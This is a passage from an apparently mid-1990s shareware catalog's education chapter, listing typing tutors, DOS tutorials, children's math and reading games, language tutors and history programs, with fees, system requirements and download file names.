discounts on upgrades. 2-month free upgrading + allowed. + Look for: VGW102.ZIP on BBSs; VGW102.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 0 (or contact userID 73427,112 for + assistance). + PsL#: 10319 + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + Extremely flexible grading and attendance program. Plots, + statistics, seating charts, numerous printouts, database items, + sections, unlimited students and tasks. You can weight, + average, discard, sum, and require tasks (assignments). It has + complete analysis tools, including statistics, plots, and ways + to modify grades. + + + 13.8 Computers + + See also: Computer programming, Tutorials; Home & hobby, + Computers; Business, Training & support aids. + + Product: Basic Training + BASIC language tutorial. See full description on page 409. + + Product: Computer Dictionary for Windows + Author: Gary FitzGerald, 914-357-4171 + Version: 2.00 (12-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. 1000k RAM; VGA + monitor; Hard disk; Mouse. Windows 3.1, Windows 95, OS/2 2.1, + OS/2 WARP. + Registration fee: $5.00 + Registration benefits: quick-reference card; 3 months of + unlimited phone, CompuServe, mail support; all ASP-wide offers + (see page 6); discounts on other products; discounts on + + Chapter 13, "Education" 455 + + + + upgrades. 3-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: CDICT2.ZIP on BBSs; CDICT2.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 103212,404 for + assistance). + Download size: 475k (about 35 minutes with a 2400 baud modem) + Description: + This compendium of over 1001 computer definitions is available + at the click of a button. These are definitions of the first + 1001 terms that every computer user should know. Easy to + install and easier to use, this is a program that belongs on + everyone's hard disk. Sample deluxe version has terms + organized in categories or groupings of related terms. + + + Product: QA Study Aid + Comprehensive computer testing/grading system. See full + description on page 312. + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 162. + + 13.8.1 Operating system tutors + + Product: DOS Summary + Author: Computer Knowledge + Version: 1.01 (02-23-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $0.00 + Registration benefits: Support. + Look for: DOSSUM.ZIP on BBSs; DSUM01.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 75655,210 for + assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A DOS command summary program. When started from DOS you have + the option of accessing either an alphabetical menu of DOS + commands or a menu where commands are grouped by function. A + second way of accessing a command is by starting the program + with a command name as a parameter. Finds the closest match to + the command you entered - so exact spelling is not necessary. + Only DOS commands are in this version; batch commands and + CONFIG.SYS commands are not. DOS versions to 4.01 supported. + + Chapter 13, "Education" 456 + + + + Product: DOS Summary (Hypertext) + Author: Computer Knowledge + Version: 2.0 (02-15-92) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $25.00 + Registration benefits: Printed manual with command examples not + found in the software, master disks, bonus utilities. + Shareware disks of other products. + Look for: DOSSUM20.ZIP on BBSs; DSUM02.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 75655,210 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + DOS Summary is a hypertext tutorial and reference product which + covers all DOS commands and drivers through MS-DOS 5.0. Also + added are tutorials covering memory management and how DOS + starts. The program can be used in standalone or resident mode. + When started, you have the option of an alphabetical command + menu or a menu where commands are grouped by function. You may + also start the program with a DOS command name as a parameter + and be taken immediately to that command. + + + Product: TUTOR.COM + Author: Computer Knowledge + Version: 4.5 (05-01-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $15.00 + Registration benefits: Printed manual, master disks. + Look for: TUTCOM.ZIP on BBSs; TUTCOM.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 75655,210 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + Description: + A minicourse in microcomputing covering the basics of a variety + of topics including: Computer History, Introduction to DOS, + Computer Terminology, Subdirectories, Hardware, Batch Files, + the Keyboard, and Introduction to Programming. Material is + presented in a series of screens and the user has the ability + to move forward or backward through the tutorials, or jump to + selected locations using a menu. Short quizzes test you on your + knowledge but you may bypass these when reviewing. + + Chapter 13, "Education" 457 + + + + 13.8.2 Typing tutors + + Product: FasType for MS-DOS + Author: Trendtech Corporation, 201-694-8622 + Version: 1.2 (12-31-94) + Needs: IBM PC, DOS 5.0 or better. 400k RAM; VGA monitor; Dual + 720k floppy drives. + Strongly recommended: Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; 1-month limited + return policy; all ASP-wide offers (see page 6). 6-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: FTYP12.ZIP on BBSs; FTYP12.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 2 (or contact userID 76210,771 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Typing tutorial for MS-DOS. Specify version: VGA, CGA, or MONO. + Beginners and advanced typists will find the drills, exercises, + and Open Typing formats easy to use, and touch-typing easy to + learn. Licenses available for schools, colleges, and corporate + training centers. Features include graphics animation and + sound; multiple keyboard displays. Open typing lets you type + anything you want, timed or unlimited. Become more productive, + learn how to type using FasType for MS-DOS. + + + Product: FasType for Windows + Author: Trendtech Corporation, 201-694-8622 + Version: 5.0 (01-01-96) + Needs: IBM 80386, Windows 3.1 or better. + Strongly recommended: SVGA monitor; Hard disk; sound card. + Registration fee: $29.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited phone, fax, + CompuServe, mail support; 1-month limited return policy; bonus + data; all ASP-wide offers (see page 6); discounts on upgrades. + + Chapter 13, "Education" 458 + + + + 6-month free upgrading allowed. 2 free update disk(s) sent + out. Bonus utility to teach typing technique. + Look for: FASTYP50.ZIP on BBSs; FASTYP50.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 2 (or contact userID 76210,7771 for + assistance). + SWREG#: 9089 + PsL#: 14379 + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + Typing tutorial for all version of Windows. Beginners and + advanced typists will find the drills, exercises, and Open + Typing formats easy to use, and touch-typing easy to learn. + Licenses available for schools, colleges, and corp. training + centers. Features include graphics and sounmd; text window uses + TrueType. Open Typing has a text editor for creating your own + typing files. Timed exercises to one hour. Become more + productive with your PC, learn how to touch type with FasType. + + + 13.8.3 Educational computer games + + See also: Games. + + Product: Crossdown for Windows + Solve and construct crossword puzzles. See full description on + page 628. + + Product: Crossword Construction Kit + Windows crossword puzzle creator. See full description on + page 628. + + Product: Dino Numbers + Arithmetic practice game for ages 7-12. See full description + on page 472. + + Product: Dino Spell + Spelling practice for ages 5-9. See full description on + page 431. + + Product: Discover Juggling 1 - Balls + Learn to juggle 3, 4, and 5 balls. See full description on + page 544. + + Product: Discover Karate 1 - White Belt + Learn Beginning Karate. See full description on page 575. + + Product: Enigmacross for Windows + Solve and construct acrostic puzzles. See full description on + page 629. + + Chapter 13, "Education" 459 + + + + Product: Mouse Math + Author: Hufnagel Software, 814-226-5600 + Version: 1.0 (08-15-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: SVGA monitor; sound card. + Registration fee: $20.00 (add $10.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, CompuServe, mail support; + bonus data; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 2200k (about 163 minutes with a 2400 baud modem) + Description: + A verbal mathematics drill program for Windows that gradually + uncovers whimsical photographs as answers to spoken basic math + problems are clicked with a mouse. Setup options allow you to + select problem ranges appropriate for young children, teens and + adults. + + + Product: Penny Penguin's Math Bingo + Author: LatticeWork Software + Version: 2.3 (11-15-95) + Needs: IBM 80386, Windows 3.1 or better. 700k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + limited return policy. + Look for: availability unknown on BBSs; MBINGO.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 20 (or contact userID 74453,2112 + for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Penny Penguin's Math Bingo is a multimedia game designed to + teach your child addition, subtraction, multiplication and + division. With cute animation and excellent sound effects, + Penny will play "Bingo" with your child, gently helping him or + her to choose the correct block on the bingo card. Used in + schools. This version requires Windows 3.1. + + Chapter 13, "Education" 460 + + + + Product: Penny Penguin's Math Bingo <95> + Author: LatticeWork Software + Version: 2.3 (11-18-95) + Needs: IBM 80386, Windows 95 or better. 640k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + limited return policy. + Look for: availability unknown on BBSs; MBINGB.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 15 (or contact userID 74453,2112 + for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Penny Penguin's Math Bingo is a multimedia game designed to + teach your child addition, subtraction, multiplication and + division. With cute animation and excellent sound effects, + Penny will play "Bingo" with your child, gently helping him or + her to choose the correct block on the bingo card. Used in + schools. This version requires Windows 95. + + + Product: Personal Challenge + Author: R.K. West Consulting (Rosemary K. West) + Version: 1.1 (10-04-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM. + Strongly recommended: Hard disk; HP LaserJet printer; Epson + printer. + Registration fee: $15.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + bonus utilities; bonus data; discounts on upgrades. + Look for: CHALL11.ZIP on BBSs; CHALL.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10541 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Play different educational and trivia games to test your + knowledge in a variety of categories as you compete against + yourself or others. Your choice of Beginner, Intermediate or + Expert determines how fast you play and how many points you can + earn. Winners earn Honorary Degrees and a chance for fame on + the High Scorers list. + + Chapter 13, "Education" 461 + + + + Product: Roxie's ABC Fish + Author: LatticeWork Software + Version: 1.2 (11-20-95) + Needs: IBM 80386, Windows 3.1 or better. 840k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + return policy; bonus data; discounts on other products. + Look for: availability unknown on BBSs; RMATFA.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 20 (or contact userID 74453,2112 + for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Roxie's ABC Fish is a multimedia game designed to teach your + child to recognize upper and lower case letters and numbers. + With attractive animation and excellent sound effects, Roxie + the cat will play "Go Fish" with your child, gently helping him + or her to choose the correct card. The mouse cursor changes in + different areas of the screen, providing for intuitive play. + Used in schools. This version requires Windows 3.1. + + + Product: Roxie's ABC Fish + Author: LatticeWork Software + Version: 1.2 (11-20-95) + Needs: IBM 80386, Windows 95 or better. 840k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RMATFB.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 15 (or contact userID 74453,2112 + for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Roxie's ABC Fish is a multimedia game designed to teach your + child to recognize upper and lower case letters and numbers. + With attractive animation and excellent sound effects, Roxie + the cat will play "Go Fish" with your child, gently helping him + or her to choose the correct card. The mouse cursor changes in + different areas of the screen, providing for intuitive play. + Used in schools. This version requires Windows 95. + + Chapter 13, "Education" 462 + + + + Product: Roxie's Math Fish + Author: LatticeWork Software + Version: 1.2 (11-15-95) + Needs: IBM 80386, Windows 3.1 or better. 900k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RMATFA.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 20 (or contact userID 74453,2112 + for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Roxie's Math Fish is a multimedia game designed to teach your + child addition, subtraction, multiplication and division. With + attractive animation and excellent sound effects, Roxie the cat + will play "Go Fish" with your child, gently helping him or her + to choose the correct card. The mouse cursor changes in + different areas of the screen, providing for intuitive play. + Used in schools. This version requires Windows 3.1. + + + Product: Roxie's Math Fish + Author: LatticeWork Software + Version: 1.2 (11-15-95) + Needs: IBM 80386, Windows 95 or better. 800k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RMATFB.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 15 (or contact userID 74453,2112 + for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Roxie's Math Fish is a multimedia game designed to teach your + child addition, subtraction, multiplication and division. With + attractive animation and excellent sound effects, Roxie the cat + will play "Go Fish" with your child, gently helping him or her + to choose the correct card. The mouse cursor changes in + different areas of the screen, providing for intuitive play. + Used in schools. This version requires Windows 95. + + Chapter 13, "Education" 463 + + + + Product: Roxie's Reading Fish + Author: LatticeWork Software + Version: 1.2 (11-15-95) + Needs: IBM 80386, Windows 3.1 or better. 1220k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RREAFA.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 20 (or contact userID 74453,2112 + for assistance). + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Roxie's Reading Fish is a multimedia game designed to teach + your child to read many high frequency words. With attractive + animation and excellent sound effects, Roxie the cat will play + "Go Fish" with your child, gently helping him or her to choose + the correct word. The mouse cursor changes in different areas + of the screen, providing for intuitive play. Used in schools + and libraries. This version requires Windows 3.1. + + + Product: Roxie's Reading Fish + Author: LatticeWork Software + Version: 1.2 (11-15-95) + Needs: IBM 80386, Windows 95 or better. 1140k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RREAFB.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 15 (or contact userID 74453,2112 + for assistance). + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Roxie's Reading Fish is a multimedia game designed to teach + your child to read many high frequency words. With attractive + animation and excellent sound effects, Roxie the cat will play + "Go Fish" with your child, gently helping him or her to choose + the correct word. The mouse cursor changes in different areas + of the screen, providing for intuitive play. Used in schools + and libraries. This version requires Windows 95. + + + Product: Word Search Construction Kit + Windows word search puzzle creator. See full description on + page 630. + + Chapter 13, "Education" 464 + + + + Product: Word Search Puzzle Maker + Creates shaped printed word search puzzles. See full + description on page 633. + + Product: Word Search Rampage + Multi-media ready words search game. See full description on + page 633. + + Product: Word Wrestle + Boggle(tm) style word game. See full description on page 627. + + Product: WORDS + Spell words using falling letters. See full description on + page 627. + + + 13.9 Foreign language + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 446. + + Product: GAKUSEI + Author: Barham Software, 310-327-4862 + Version: 1.1.3 (06-12-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; EGA monitor; Hard + disk. + Strongly recommended: HP LaserJet printer; Epson printer. HP + LJII or Epson LQ with 32K. + Registration fee: $55.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited + tollfree 800# phone, CompuServe, mail support; bonus data; + discounts on upgrades. + Look for: availability unknown on BBSs; GAK11*.EXE on CompuServe + in CIS:FLEFO forum LIBrary 7 (multiple files) (or contact + userID 70700,2225 for assistance); GAK*.* on GEnie in EDUCATION + forum LIBrary 0 (multiple files). + PsL#: 11283 + Download size: 1500k (about 112 minutes with a 2400 baud modem) + Description: + An elementary Japanese grammar tutorial. Lessons include: an + introduction to kana; onomatopoeia; DESU copula; ARIMASU/IMASU + verbs of existence; WA, GA, E, O, DE, and NI relationals; + dictionary and -MASU verb forms; NA adjectives; and more. + + + Product: Hebrew Edit + Hebrew text editor with vowels. See full description on + page 184. + + Chapter 13, "Education" 465 + + + + Product: LinguaPro/SPANISH + Author: Schulenberg and Associates, Inc. (Craig W. Schulenberg), + 713-440-4444 + Version: 2.50 (09-06-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: EGA monitor. + Registration fee: $39.95 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; all ASP-wide + offers (see page 6); discounts on other products. Bonus + courses; bonus vocabulary; complete verb reference. + Look for: availability unknown on BBSs; LPROSP.EXE on CompuServe + in CIS:FLEFO forum LIBrary 1 (or contact userID 72650,3160 for + assistance); LPRSP250.EXE on GEnie in EDUCATION forum LIBrary 2 + (or contact userID C.SCHULENBER for assistance). + PsL#: 10875 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Implements Units 1-18 of the FSI Basic Spanish Course + (including grammar tutorials), Units 1-12 consist of a + conversational course in the Castilian dialect, a 19,000-word + user-modifiable online dictionary, a flashcarding system for + mastery of this graded 5-level vocabulary, a unique verb + conjugation system that drills verbs in all tenses/persons + using millions of complete sentences, and a verb reference with + definitions and conjugations of over 9200 verbs, including + idiomatic usages. + + + Product: SPANISH DRILL! + Author: LONE WOLF ENTERPRISES (John A. Jackson) + Version: 1.8 (11-09-93) + Needs: IBM PC, DOS 4.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk. + Registration fee: $5.00 (add $2.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 6 months of phone, + CompuServe, mail support; 3-month return policy; all ASP-wide + offers (see page 6); discounts on other products. 2-month free + upgrading allowed. + Look for: SPAN1.ZIP on BBSs; SPAN1.ZIP on CompuServe in CIS:LIB + forum LIBrary 0 (or contact userID 73353,121 for assistance); + SPAN1.ZIP on GEnie in GE forum LIBrary 0. + Download size: 46k (about four minutes with a 2400 baud modem) + Description: + Spanish vocabulary flash card program that has a practice mode + for learning new Spanish words and an exam mode to test and + score you on what you have learned. Requires you to type the + + Chapter 13, "Education" 466 + + + + correct Spanish letters, such as accents and tildes! Fun, + inexpensive and easy way to develop your basic Spanish + vocabulary. Start with nouns, adjectives, and verbs, then work + your way up to verb conjugation, common phrases and full + sentences! + + + Product: Spanish Helper Level One + Author: G.B. Blanchard, 212-598-4939 + Version: 1.6 (11-16-95) + Needs: IBM PC, DOS 3.3 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk. + Strongly recommended: CD-ROM drive. + Registration fee: $24.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, BBS, CompuServe, mail support; 3-month + return policy; bonus utilities; all ASP-wide offers (see + page 6). Program with Spanish jokes with option to see + translations. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + An excellent interactive program to learn Spanish. The + programs' interactive quizzing system allows you to learn + vocabulary rapidly. Contains a large database of vocabulary and + allows you to make your own lists to quiz yourself. Its well- + planned design makes it the perfect program for individuals or + schools. + + + Product: WRITE CHINESE + Author: Awareness Productions (Thomas Yee), 214-517-0279 + Version: 1.00 (05-18-94) + Needs: IBM AT (80286), DOS 3.0 or better. 512k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $29.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; 1-month return policy; bonus + data; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: CHINA100.ZIP on BBSs (call 214-690-2168 to download it + at no charge). + Download size: 143k (about eleven minutes with a 2400 baud modem) + Description: + This program teaches basic Chinese calligraphy. Focuses on the + 150 most frequently encountered characters which constitute + approximately 1/3 of all printed materials. The student + practices calligraphy by drawing characters on simulated "nine- + square box" paper. Evaluates each character as it is being + + Chapter 13, "Education" 467 + + + + drawn, providing continuous feedback and positive + reinforcement. Also has quiz options to teach character + meanings and Mandarin/Cantonese transliterations. + + + 13.10 Geography + + See also: Graphics. + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 430. + + Product: Know It All + The incredible, EXPANDABLE learning game. See full description + on page 432. + + Product: Landscape Explorer + 3D landscape visualization tool. See full description on + page 502. + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 502. + + Product: U.S. Geography Tutor + Author: On-Target Software (Michael Russo), 415-474-9973 + Version: 1.0 (04-01-94) + Needs: IBM PC, Windows 3.0 or better. 256k RAM. + Registration fee: $20.00 + Registration benefits: 31/2" master disk(s); 3 months of + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 6). 1-month free upgrading allowed. Bonus + geography-related book. + Look for: availability unknown on BBSs; GEOUSA.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + A Windows program intended for grade school children. It tests/ + teaches you U.S. geography in an entirely visual way. Learn + about state locations, capital cities, lakes and rivers, simply + by clicking the mouse. + + + Product: VERSAMAP + Draws outline maps on 14 map projections. See full description + on page 503. + + + 13.11 History + + Product: Bible Timeline + Interactive Bible timelines. See full description on page 578. + + Chapter 13, "Education" 468 + + + + Product: Bible Timeline for Windows + Interactive historical timelines. See full description on + page 583. + + Product: CHRONOS + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 2.18 (01-10-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor; Dual 720k floppy drives; HP DeskJet + printer; HP LaserJet printer. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of CompuServe, mail support; bonus utilities; disks of + other shareware; discounts on other products. + Look for: availability unknown on BBSs; CHRNOS.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 11 (or contact userID 76703,3046 for + assistance). + SWREG#: 381 + Download size: 132k (about ten minutes with a 2400 baud modem) + Description: + How old was Paul Revere when he rode into history? How many + years separated Michelangelo and Cortez? This program lets you + sort and select by individual people and events, or groups and + factions, to develop new insights and trace patterns across + different eras and cultures. Useful to history and art + students, teachers, genealogists, lawyers, writers or anyone + interested in exploring historical relations or cultural + events. Prints wall charts. Also includes an automatic trivia + game generator + + + Product: CHRONOS:Windows in Time + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.10 (09-01-95) + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus data; bonus + graphics; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; WIT.ZIP on CompuServe in + CIS:WINPROD forum LIBrary 14 (or contact userID 76703,3046 for + assistance). + SWREG#: 5787 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + How old was Paul Revere when he rode into history? This lets + you sort and selects individual people and events, or groups + and factions, to develop new insights and trace patterns + across different eras and cultures. You can modify or expand + + Chapter 13, "Education" 469 + + + + any of the datasets. Used by history & art students, teachers, + genealogists, lawyers, writers or anyone interested in + exploring historical relations or cultural events. + + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 430. + + Product: DayMaster + A day in history & reminder system. See full description on + page 136. + + Product: DayMaster For Windows + A day in history & reminder system. See full description on + page 137. + + Product: On This Day + Author: The Software Construction Co., 508-851-6204 + Version: 2.0 (07-30-94) + Needs: IBM PC, DOS 2.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Hard disk. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; disks of + other shareware; discounts on other products. 3-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: OTD_20.ZIP on BBSs (call 508-454-3864 to download it at + no charge); OTD.ZIP on CompuServe in CIS:PCUTIL forum LIBrary 7 + (or contact userID 70313,3615 for assistance); OTD_20.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID W.GEISER for + assistance). + SWREG#: 2074 + PsL#: 10654 + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + This event DB and printing program accepts the date in which + you are interested and it prints the events that happened on + that day in history: + * Astronomical events (moon phases, solstices, etc) + * Birthdays of famous people + * Religious holidays (Jewish, Christian, etc) + * Much more + Uses text file databases, meaning you can edit them with your + favorite text editor (though they can be read in compressed + form). A personal events file is also supported. + + Chapter 13, "Education" 470 + + + + Product: On This Day for Windows + Author: The Software Construction Co., 508-851-6204 + Version: 2.0 (07-30-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; disks of + other shareware; discounts on other products. 3-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: WOTD_20.ZIP on BBSs (call 508-454-3864 to download it + at no charge); WOTD.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 70313,3615 for assistance); + WOTD_20.ZIP on GEnie in WINDOWS forum LIBrary 76 (or contact + userID W.GEISER for assistance). + SWREG#: 2093 + PsL#: 10654 + Download size: 164k (about twelve minutes with a 2400 baud modem) + Description: + This event DB and printing program accepts the date in which + you are interested and it prints the events that happened on + that day in history: + * Astronomical events (moon phases, solstices, etc) + * Birthdays of famous people + * Religious holidays (Jewish, Christian, etc) + * Much more + Uses text file databases, meaning you can edit them with your + favorite text editor (though they can be read in compressed + form). A personal events file is also supported. + + + 13.12 Literature + + Product: Creativity Package + Become more creative & improve your writing. See full + description on page 197. + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 430. + + Product: Have You Read That Movie? + Quiz/database: films based on literary works. See full + description on page 624. + + Product: Jokes & Quotes + Network/standalone daily message system. See full description + on page 369. + + Product: KBBLH120.ZIP + Kabbalah: The Prophecy of the Chariot. See full description on + page 581. + + Chapter 13, "Education" 471 + + + + Product: New Testament for Windows + New Testament search, maps, study aids, notes. See full + description on page 578. + + Product: Poetry Generator + Turn your computer into a poet! See full description on + page 200. + + + 13.13 Math + + See also: Mathematics. + + Product: Dino Numbers + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 4.0 (01-01-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: sound card. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited 